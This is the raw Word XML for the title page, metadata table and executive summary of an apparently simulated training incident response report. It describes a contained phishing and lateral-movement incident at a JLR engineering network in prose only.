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p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="2D6A4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TRINITY PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Security Event Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; Incident Response Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="4B5563"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Incident: Credential-Based Lateral Movement — OT/R&amp;D Network Boundary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="280"/>
      </w:pP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tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Program</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DAE Cybersecurity &amp; Networking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A4F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JLR — Jaguar Land Rover (Trinity Project Scenario)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0312</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A4F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Theft + Lateral Movement — OT/R&amp;D Boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A4F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Microsoft Sentinel SIEM  |  Darktrace NDR  |  CrowdStrike Falcon EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JLR Coventry Engineering HQ — VLAN 20 (R&amp;D) and VLAN 30 (OT/Mfg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A4F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-61r2  |  ISO/IEC 27035  |  NIS2 Directive (UK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidential — Internal Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A4F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version / Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1.0 Final  |  April 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="560"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the detection, analysis, and response to a Priority 1 (Critical) security incident identified within the JLR enterprise network on 18 March 2026 at 02:41 UTC. JLR (Jaguar Land Rover), a subsidiary of Tata Motors and one of the UK's largest automotive manufacturers, operates a complex, globally distributed enterprise network spanning engineering design centers, advanced manufacturing facilities, supplier integration environments, and connected vehicle telemetry infrastructure. The convergence of IT and OT (Operational Technology) systems across JLR's EV manufacturing and engineering R&amp;D programs creates a broad attack surface requiring continuous, sophisticated security monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The incident documented in this report — designated INC-JLR-2026-0312 — involved the theft of a domain service account credential via a spear-phishing email targeting an R&amp;D engineer at JLR's Coventry Engineering headquarters, followed by lateral movement from the Corporate IT VLAN (VLAN 10) into the R&amp;D/Engineering VLAN (VLAN 20), and an attempted breach of the OT/Manufacturing VLAN boundary (VLAN 30) hosting production line control systems for the Electric Range Rover platform.</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3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">INCIDENT SUMMARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D8F3DC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0312  |  P1 Critical  |  Duration: 4h 17m (detection to containment)  |  Attack chain: Phishing &gt; Credential theft &gt; Lateral movement &gt; OT boundary probe  |  Outcome: CONTAINED — OT systems not breached  |  Affected systems: 2 workstations, 1 service account, 1 file server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This report fulfills the Trinity Project monitoring and incident response deliverable requirement, providing full documentation of the monitoring infrastructure, raw log evidence, simulated SIEM alert dashboards, and a step-by-step incident response walkthrough aligned to NIST SP 800-61r2 (Computer Security Incident Handling Guide) and ISO/IEC 27035.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
